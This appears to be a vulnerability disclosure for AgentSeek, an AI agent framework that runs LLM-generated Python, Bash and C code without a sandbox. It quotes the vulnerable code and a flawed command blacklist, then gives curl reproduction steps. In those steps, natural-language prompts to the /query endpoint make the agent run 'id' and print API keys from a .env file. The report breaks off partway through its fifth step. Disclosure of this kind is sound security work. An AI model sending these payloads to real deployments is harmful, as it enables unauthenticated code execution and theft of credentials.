AgentSeek RCE via Unsandboxed LLM Code Execution

## CVE Report: Remote Code Execution via Unsandboxed LLM-Generated Code Execution ### Vulnerability Overview AgentSeek contains a critical remote code execution vulnerability where unauthenticated attackers can execute arbitrary code on the host system via a single HTTP POST request to the `/query` endpoint, leveraging LLM-generated code. The system completely lacks sandbox isolation with multiple code execution entry points. **Vulnerability Type**: Code Injection, Command Injection **CVSS Score**: 10.0 (Critical) **CWE IDs**: CWE-94, CWE-78, CWE-184 ### Affected Scope **Affected Components**: - `sources/tools/PyInterpreter.py` (lines 22-57): Python `exec()` execution with full `os`/`sys` access - `sources/tools/BashInterpreter.py` (lines 35-71): `subprocess.Popen` with `shell=True` - `sources/tools/C_Interpreter.py` (lines 21-70): Unsandboxed compiled binary execution - `sources/tools/safety.py` (lines 4-88): Bypassable security blacklist - `sources/tools/tools.py` (line 44): `safe_mode = False` disabled by default **Specific Vulnerability Points**: 1. **Python exec() - CWE-94**: `PyInterpreter.execute()` uses `exec()` to execute arbitrary LLM-generated code, with `global_vars` containing `__builtins__`, `os`, `sys` and other modules; no timeout, no resource limits, no sandbox 2. **Bash shell=True - CWE-78**: `BashInterpreter.execute()` uses `subprocess.Popen()` with `shell=True`, directly executing arbitrary OS commands through string interpolation 3. **C/Go/Java Compilation - CWE-94**: Compiler directly compiles LLM-generated source code and executes with parent process privileges; no seccomp, no chroot, no network isolation 4. **Bypassable Security Blacklist - CWE-184**: `safe_mode` is disabled by default; even when manually enabled, the blacklist has critical flaws: - Incomplete: missing `curl`, `wget`, `nc`, `python3`, `bash`, `crontab`, `ssh`, etc. - String concatenation error: lines 31-32 missing comma, merging `"route"` and `"-force"` into invalid `"route-force"` - Substring-only matching: can be bypassed through path obfuscation or evasion ### POC Code / Exploitation Code **Vulnerable Code Snippet - Python exec() Full System Access** (`sources/tools/PyInterpreter.py:33-41`): ```python global_vars = { "__builtins__": __builtins__, # Full builtins - import, eval, compile, open... "os": os, # Full OS module - file ops, env vars, system() "sys": sys, # Full system module - path, exit, modules "__name__": "__main__" } code = """{user_code}""" try: buffer = exec(code, global_vars) # Arbitrary code execution - no sandbox ``` **Vulnerable Code Snippet - Bash shell=True Execution** (`sources/tools/BashInterpreter.py:44-58`): ```python command = f"cd {self.work_dir} && {command}" # Direct string interpolation, no escaping if self.safe_mode and is_unsafe(command): # safe_mode defaults to False return "Error: Command blocked" process = subprocess.Popen( command, # Shell injection vector shell=True, # Shell injection vector stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True ) ``` **Vulnerable Code Snippet - C/Go Unsandboxed Compilation & Execution** (`sources/tools/C_Interpreter.py:39-56`): ```python compile_command = ["gcc", source_file, "-o", exec_file] subprocess.run(compile_command, capture_output=True, text=True, timeout=60) run_command = [exec_file] subprocess.run(run_command, capture_output=True, text=True, timeout=120) # No sandbox, no seccomp, no chroot, no network isolation ``` **Vulnerable Code Snippet - Security Blacklist Missing Comma Error** (`sources/tools/safety.py:30-34`): ```python "chroot", # Change root directory "route" # Route table management —— missing comma "-force", # Force flag for many commands —— concatenated to "route-force" "rshut", "git" ``` **Vulnerable Code Snippet - safe_mode Disabled by Default** (`sources/tools/tools.py:44`): ```python self.safe_mode = False # Blacklist never invoked ``` **Attack Reproduction Steps**: **Step 1: Confirm API is accessible without authentication** ```bash curl -s http://localhost:7777/health ``` **Step 2: Send RCE payload - Execute system commands via POST /query** ```bash curl -s -X POST http://localhost:7777/query \ -H "Content-Type: application/json" \ -d '{"query":"Write and run a python script that prints the output of os.popen(\"id\").read()"}' \ --max-time 600 ``` **Step 3: Verify command execution in response** JSON response `blocks[0].feedback` field contains: ``` uid=502(xxx) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),... ``` **Step 4: Send RCE payload - Steal API keys from .env file** ```bash curl -s -X POST http://localhost:7777/query \ -H "Content-Type: application/json" \ -d '{"query":"write python to read the .env file and print lines containing KEY"}' \ --max-time 600 ``` Sample response: ``` OPENAI_API_KEY=sk4xxxxxxxxxxxxx DEEPSEEK_API_KEY=xxxx TOGETHER_API_KEY=xxxx GOOGLE_API_KEY=xxxx ANTHROPIC_API_KEY=xxxx MISTRAL_API_KEY=xxxx ``` **Step 5: Verify security blacklist can be bypassed (

Goal Reached Thanks to every supporter — we hit 100%!

AgentSeek RCE via Unsandboxed LLM Code Execution

More from this source